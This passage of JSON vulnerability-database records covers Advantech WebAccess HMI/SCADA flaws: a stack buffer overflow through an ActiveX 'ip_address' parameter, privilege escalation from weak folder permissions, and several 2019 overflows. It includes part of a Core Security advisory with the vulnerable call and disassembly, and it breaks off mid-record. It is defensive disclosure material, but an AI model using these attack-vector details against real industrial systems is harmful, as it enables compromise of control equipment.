"sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.2, "vendor": "advantech", "version": "7.2" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "7.2" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "8.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "b5ed655e-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-08420" }, { "db": "JVNDB", "id": "JVNDB-2014-005588" }, { "db": "CNNVD", "id": "CNNVD-201411-391" }, { "db": "NVD", "id": "CVE-2014-8388" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-005588" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Ricardo Narvaja from Core Security Consulting Services", "sources": [ { "db": "BID", "id": "71193" } ], "trust": 0.3 }, "cve": "CVE-2014-8388", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.9, "id": "CVE-2014-8388", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2014-08420", "impactScore": 8.5, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "b5ed655e-2351-11e6-abef-000c29c66e3d", "impactScore": 8.5, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.9, "id": "VHN-76333", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-8388", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2014-8388", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2014-08420", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201411-391", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "b5ed655e-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-76333", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "b5ed655e-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-08420" }, { "db": "VULHUB", "id": "VHN-76333" }, { "db": "JVNDB", "id": "JVNDB-2014-005588" }, { "db": "CNNVD", "id": "CNNVD-201411-391" }, { "db": "NVD", "id": "CVE-2014-8388" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Stack-based buffer overflow in Advantech WebAccess, formerly BroadWin WebAccess, before 8.0 allows remote attackers to execute arbitrary code via a crafted ip_address parameter in an HTML document. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. A stack buffer overflow vulnerability exists in Advantech WebAccess because the application failed to properly check the user-supplied data before copying it to a full-size buffer. An attacker could exploit this vulnerability to execute arbitrary code in the context of an application (usually Internet Explorer) that is affected by an ActiveX control. Failed exploit attempts will likely result in denial-of-service conditions. \nAdvantech WebAccess 7.2 is vulnerable; other versions may also be affected. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nAdvantech WebAccess Stack-based Buffer Overflow\n\n\n1. *Advisory Information*\n\nTitle: Advantech WebAccess Stack-based Buffer Overflow\nAdvisory ID: CORE-2014-0010\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/advantech-webAccess-stack-based-buffer-overflow\nDate published: 2014-11-19\nDate of last update: 2014-11-19\nVendors contacted: Advantech\nRelease mode: Coordinated release\n\n\n2. *Vulnerability Description*\n\n Advantech WebAccess [1] is a browser-based software package for\nhuman-machine interfaces HMI, and supervisory control and data\nacquisition SCADA. \n \n\n4. WebAccess 7.2\n . \n\n\n5. *Vendor Information, Solutions and Workarounds*\n\n Given that this is a client-side vulnerability, affected users\nshould avoid opening untrusted \u0027.html\u0027 files. Core Security also\nrecommends those affected use third party software such as Sentinel [3]\nor EMET [2] that could help to prevent the exploitation of affected\nsystems to some extent. \n \n Additionally the vendor released WebAccess v8 [4] where it has\ndeleted the vulnerable file \u0027webeye.ocx\u0027 but if version upgrade is being\nperformed, the vulnerable ocx file is not deleted at all, therefore we\ndo not consider this a correct fix. \n \n\n6. *Credits*\n\n This vulnerability was discovered and researched by Ricardo Narvaja\nfrom Core Security Consulting Services. The publication of this advisory\nwas coordinated by Joaqu\\xedn Rodr\\xedguez Varela from Core Advisories Team. \n\n\n7. This is caused because the\napplication copies to the stack the string without checking its length. \n \n\n/-----\n \ndocument.vdoactx.Connect(ip_address, port_no);\n\n-----/\n\n\n/-----\n \n0001C2AA 8B11 MOV EDX,DWORD PTR DS:[ECX]\n0001C2AC 8A45 08 MOV AL,BYTE PTR SS:[EBP+8]\n0001C2AF 8802 MOV BYTE PTR DS:[EDX],AL\n0001C2B1 FF01 INC DWORD PTR DS:[ECX]\n0001C2B3 0FB6C0 MOVZX EAX,AL\n0001C2B6 EB 0B JMP SHORT 0001C2C3\n\n-----/\n\n\n8. *Report Timeline*\n. 2014-10-01:\n\n Initial notification sent to ICS-CERT informing of the vulnerability\nand requesting the vendor\u0027s contact information. 2014-10-01:\n\n ICS-CERT informs that they will ask the vendor if they want to\ncoordinate directly with us or if they prefer to have ICS-CERT mediate. \nThey request the vulnerability report. 2014-10-01:\n\n ICS-CERT informs that the vendor answered that they would like the\nICS-CERT to mediate the coordination of the advisory. They requested\nagain the vulnerability report. 2014-10-01:\n\n We send the vulnerability detail, including technical description\nand a PoC. 2014-10-09:\n\n We request a status update on the reported vulnerability. 2014-10-20:\n\n ICS-CERT informs that the vendor has patched WebAccess in version\n8.0 and published it. This was done without informing us in order to\nmake a coordianted release. The ICS-CERT asks if we can test the fix. 2014-10-21:\n\n We clearly state how we disagree with the uncoordinated published\nfix. We began testing the fix. 2014-10-21:\n\n We inform them that the \"webeye.ocx\" file (version 1.0.1.35) is\nstill present in the new version. 2014-10-27:\n\n ICS-CERT informs us that the vendor has removed the vulnerable OCX\nfile from the new version but it doesn\u0027t remove it from previous\ninstallations, making the new version still vulnerable. 2014-11-13:\n\n We inform them that we will publish this advisory as user release on\nWednesday 19th of November. 2014-11-19:\n\n Advisory CORE-2014-0010 published. \n \n\n9. *References*\n\n[1] http://webaccess.advantech.com/. \n[2] http://support.microsoft.com/kb/2458544. \n[3] https://github.com/CoreSecurity/sentinel. \n[4] http://webaccess.advantech.com/webaccess_download.php?lang=eng. \n\n\n10. *About CoreLabs*\n\n CoreLabs, the research center of Core Security, is charged with\nanticipating the future needs and requirements for information security\ntechnologies. We conduct our research in several important areas of\ncomputer security\nincluding system vulnerabilities, cyber attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at: http://corelabs.coresecurity.com. \n \n\n11. *About Core Security*\n\n Core Security enables organizations to get ahead of threats with\nsecurity test and measurement solutions that continuously identify and\ndemonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations. \n \n Core Security\u0027s software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company\u0027s Security\nConsulting Services, CoreLabs and Engineering groups. Core Security can\nbe reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com. \n \n\n12. *Disclaimer*\n\n The contents of this advisory are copyright (c) 2014 Core Security\nand (c) 2014 CoreLabs,\nand are licensed under a Creative Commons Attribution Non-Commercial\nShare-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n13. *PGP/GPG Keys*\n\n This advisory has been signed with the GPG key of Core Security\nadvisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc", "sources": [ { "db": "NVD", "id": "CVE-2014-8388" }, { "db": "JVNDB", "id": "JVNDB-2014-005588" }, { "db": "CNVD", "id": "CNVD-2014-08420" }, { "db": "BID", "id": "71193" }, { "db": "IVD", "id": "b5ed655e-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-76333" }, { "db": "PACKETSTORM", "id": "129186" } ], "trust": 2.79 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-76333", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-76333" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-8388", "trust": 3.7 }, { "db": "ICS CERT", "id": "ICSA-14-324-01", "trust": 2.5 }, { "db": "BID", "id": "71193", "trust": 1.0 }, { "db": "CNNVD", "id": "CNNVD-201411-391", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2014-08420", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2014-005588", "trust": 0.8 }, { "db": "IVD", "id": "B5ED655E-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "129186", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-76333", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "b5ed655e-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-08420" }, { "db": "VULHUB", "id": "VHN-76333" }, { "db": "BID", "id": "71193" }, { "db": "JVNDB", "id": "JVNDB-2014-005588" }, { "db": "PACKETSTORM", "id": "129186" }, { "db": "CNNVD", "id": "CNNVD-201411-391" }, { "db": "NVD", "id": "CVE-2014-8388" } ] }, "id": "VAR-201411-0359", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "b5ed655e-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-08420" }, { "db": "VULHUB", "id": "VHN-76333" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "b5ed655e-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-08420" } ] }, "last_update_date": "2024-11-23T22:56:31.568000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Top Page", "trust": 0.8, "url": "http://webaccess.advantech.com/" }, { "title": "Patch for Advantech WebAccess Stack Buffer Overflow Vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/52041" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-08420" }, { "db": "JVNDB", "id": "JVNDB-2014-005588" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-76333" }, { "db": "JVNDB", "id": "JVNDB-2014-005588" }, { "db": "NVD", "id": "CVE-2014-8388" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.5, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-324-01" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8388" }, { "trust": 0.8, "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8388" }, { "trust": 0.6, "url": "http://www.securityfocus.com/bid/71193" }, { "trust": 0.3, "url": "http://support.microsoft.com/kb/240797" }, { "trust": 0.1, "url": "https://github.com/coresecurity/sentinel." }, { "trust": 0.1, "url": "http://webaccess.advantech.com/webaccess_download.php?lang=eng." }, { "trust": 0.1, "url": "http://corelabs.coresecurity.com." }, { "trust": 0.1, "url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc." }, { "trust": 0.1, "url": "http://corelabs.coresecurity.com/" }, { "trust": 0.1, "url": "http://webaccess.advantech.com/." }, { "trust": 0.1, "url": "http://www.coresecurity.com." }, { "trust": 0.1, "url": "http://support.microsoft.com/kb/2458544." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8388" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/" }, { "trust": 0.1, "url": "http://www.coresecurity.com/advisories/advantech-webaccess-stack-based-buffer-overflow" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-08420" }, { "db": "VULHUB", "id": "VHN-76333" }, { "db": "BID", "id": "71193" }, { "db": "JVNDB", "id": "JVNDB-2014-005588" }, { "db": "PACKETSTORM", "id": "129186" }, { "db": "CNNVD", "id": "CNNVD-201411-391" }, { "db": "NVD", "id": "CVE-2014-8388" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "b5ed655e-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-08420" }, { "db": "VULHUB", "id": "VHN-76333" }, { "db": "BID", "id": "71193" }, { "db": "JVNDB", "id": "JVNDB-2014-005588" }, { "db": "PACKETSTORM", "id": "129186" }, { "db": "CNNVD", "id": "CNNVD-201411-391" }, { "db": "NVD", "id": "CVE-2014-8388" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-11-21T00:00:00", "db": "IVD", "id": "b5ed655e-2351-11e6-abef-000c29c66e3d" }, { "date": "2014-11-21T00:00:00", "db": "CNVD", "id": "CNVD-2014-08420" }, { "date": "2014-11-21T00:00:00", "db": "VULHUB", "id": "VHN-76333" }, { "date": "2014-11-19T00:00:00", "db": "BID", "id": "71193" }, { "date": "2014-11-25T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-005588" }, { "date": "2014-11-20T16:34:36", "db": "PACKETSTORM", "id": "129186" }, { "date": "2014-11-24T00:00:00", "db": "CNNVD", "id": "CNNVD-201411-391" }, { "date": "2014-11-21T02:59:07.270000", "db": "NVD", "id": "CVE-2014-8388" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-11-21T00:00:00", "db": "CNVD", "id": "CNVD-2014-08420" }, { "date": "2014-11-24T00:00:00", "db": "VULHUB", "id": "VHN-76333" }, { "date": "2015-07-15T00:14:00", "db": "BID", "id": "71193" }, { "date": "2014-11-25T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-005588" }, { "date": "2014-11-24T00:00:00", "db": "CNNVD", "id": "CNNVD-201411-391" }, { "date": "2024-11-21T02:19:00.403000", "db": "NVD", "id": "CVE-2014-8388" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "local", "sources": [ { "db": "CNNVD", "id": "CNNVD-201411-391" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Stack Buffer Overflow Vulnerability", "sources": [ { "db": "IVD", "id": "b5ed655e-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-08420" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "b5ed655e-2351-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201411-391" } ], "trust": 0.8 } }
var-201602-0489
Vulnerability from variot
This vulnerability allows local users to elevate to administrator status on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the configuration of directories created during installation of the product. The implementing code for many COM objects used by newly-created services, which run in an elevated privilege, is installed in a folder with weak security control.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-155" } ] }, "credits": { "_id": null, "data": "Fritz Sands - HPE Zero Day Initiative", "sources": [ { "db": "ZDI", "id": "ZDI-16-155" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "SINGLE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 6.8, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.1, "id": "ZDI-16-155", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:L/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-16-155", "trust": 0.7, "value": "MEDIUM" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-155" } ] }, "description": { "_id": null, "data": "This vulnerability allows local users to elevate to administrator status on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the configuration of directories created during installation of the product. The implementing code for many COM objects used by newly-created services, which run in an elevated privilege, is installed in a folder with weak security control.", "sources": [ { "db": "ZDI", "id": "ZDI-16-155" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-3333", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-155", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-155" } ] }, "id": "VAR-201602-0489", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:02:27.809000Z", "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-16-155", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-155", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-155", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess Local Escalation Of Privilege Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-16-155" } ], "trust": 0.7 } }
var-201906-1028
Vulnerability from variot
In WebAccess/SCADA, Versions 8.3.5 and prior, multiple stack-based buffer overflow vulnerabilities are caused by a lack of proper validation of the length of user-supplied data. Exploitation of these vulnerabilities may allow remote code execution. WebAccess/SCADA Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x271C IOCTL in the webvrpcs process. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess/SCADA is prone to the following security vulnerabilities: 1. A directory-traversal vulnerability 2. Multiple stack-based buffer-overflow vulnerabilities 3. Multiple heap-based buffer-overflow vulnerabilities 4. An information disclosure vulnerability 5. Multiple remote-code execution vulnerabilities An attacker can exploit these issues to execute arbitrary code in the context of the application, modify and delete files, use directory-traversal sequences (â??../â??) to retrieve arbitrary files, escalate privileges and perform certain unauthorized actions or obtain sensitive information. This may aid in further attacks. Advantech WebAccess/SCADA Versions 8.3.5 and prior versions are vulnerable
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 4.9, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.3.5" }, { "_id": null, "model": "webaccess/scada", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.5" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3.5" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3.4" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3.2" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.0" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.2" }, { "_id": null, "model": "webaccess/scada", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.4.1" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "917426ff-7065-403b-bd4d-431e7d3751d4" }, { "db": "ZDI", "id": "ZDI-19-620" }, { "db": "ZDI", "id": "ZDI-19-586" }, { "db": "ZDI", "id": "ZDI-19-588" }, { "db": "ZDI", "id": "ZDI-19-589" }, { "db": "ZDI", "id": "ZDI-19-592" }, { "db": "ZDI", "id": "ZDI-19-594" }, { "db": "ZDI", "id": "ZDI-19-619" }, { "db": "CNVD", "id": "CNVD-2019-32472" }, { "db": "BID", "id": "108923" }, { "db": "JVNDB", "id": "JVNDB-2019-005813" }, { "db": "NVD", "id": "CVE-2019-10991" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-005813" } ] }, "credits": { "_id": null, "data": "Mat Powell of Trend Micro Zero Day Initiative", "sources": [ { "db": "ZDI", "id": "ZDI-19-620" }, { "db": "ZDI", "id": "ZDI-19-588" }, { "db": "ZDI", "id": "ZDI-19-589" }, { "db": "ZDI", "id": "ZDI-19-592" }, { "db": "ZDI", "id": "ZDI-19-619" } ], "trust": 3.5 }, "cve": "CVE-2019-10991", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2019-10991", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2019-32472", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "917426ff-7065-403b-bd4d-431e7d3751d4", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-142593", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2019-10991", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 4.9, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2019-10991", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 9.8, "baseSeverity": "Critical", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2019-10991", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "CVE-2019-10991", "trust": 4.9, "value": "CRITICAL" }, { "author": "nvd@nist.gov", "id": "CVE-2019-10991", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2019-10991", "trust": 